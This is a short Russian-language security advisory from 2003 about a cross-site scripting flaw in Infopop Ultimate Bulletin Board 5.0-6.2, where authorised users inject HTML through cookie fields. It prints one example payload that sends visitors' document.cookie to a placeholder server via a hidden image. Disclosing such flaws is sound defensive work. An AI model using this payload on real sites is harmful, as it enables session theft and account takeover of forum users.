Security Lab

Межсайтовый скриптинг в Ultimate Bulletin Board

Дата публикации:22.07.2003
Всего просмотров:1358
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности входных данных обнаружена в Ultimate Bulletin Board. Удаленный пользователь может выполнить XSS нападения.

Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример:

username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>
Уязвимость обнаружена в Infopop Ultimate Bulletin Board 5.0-6.2
Ссылки: anti_acid hotmail com